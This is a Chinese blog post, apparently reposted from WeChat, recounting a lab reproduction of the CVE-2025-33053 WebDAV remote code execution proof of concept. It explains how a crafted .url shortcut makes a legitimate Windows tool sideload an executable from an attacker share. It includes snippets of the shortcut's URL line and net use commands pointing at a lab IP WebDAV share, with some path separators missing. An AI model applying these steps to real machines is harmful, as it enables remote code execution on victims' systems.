今天看到这个CVE Poc,来了兴趣,进行了复现,但并不顺利。开始时死活不弹出计算器测试程序,这个过程持续了一下午+一晚上,终在晚上9时,捣鼓出来了,花了2个小时截图、写文章。我觉得网上那些人,咋做得那么顺利呢?曲折有曲折的好处,通过这些过程,让我对其中的细节理解地更深体会更深。
就这样吧,脖子受不了了。
2025 年 6 月的 Windows 更新修复了CVE-2025-33053漏洞,这是一个远程代码执行漏洞,目前已发现有人在野外利用。该漏洞允许指向合法本地 Windows 可执行文件的恶意 URL 文件在打开时从攻击者位于互联网上的服务器“侧载”DLL 或 EXE 文件。注意的是,虽然微软将此漏洞命名为“WEBDAV RCE远程代码执行”,但该漏洞通常可以通过任何 SMB 网络共享(包括内部网络共享文件夹)进行利用。然而,由于大多数防火墙和互联网服务提供商会阻止 SMB 流量,因此WebDAV 的攻击场景更加强大,因为它允许恶意 DLL 直接穿过防火墙从互联网上的服务器加载。
这个漏洞有点象当年的DLL劫持一样,利用了windows搜索顺序逻辑。
攻击者使用指向 WebDAV 服务器的.url恶意快捷方式。当 Windows 执行合法工具(例如IE/Edge)时,它会默认进入远程文件夹并运行攻击者控制的二进制文件(例如),而不是本地文件。
URL=\192.168.239.128webdavroute.exe
让它直接执行,这法子果然可行;
方法2:powershell下执行
net use z: \192.168.239.128webdav
dir z:
直接打开共享;后面我关闭了net use z: /delete。
通过上面两种方法,现在改回 URL=C:Program FilesInternet Exploreriediagcmd.exe,发现可以弹出route.exe计算器了。
=====
《CVE-2025-33053,Stealth Falcon 和 Horus:中东网络间谍活动传奇》对整个攻击链的分析,值得一看。
原文始发于微信公众号(MicroPest):CVE-2025-33053 Poc复现研究细节
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论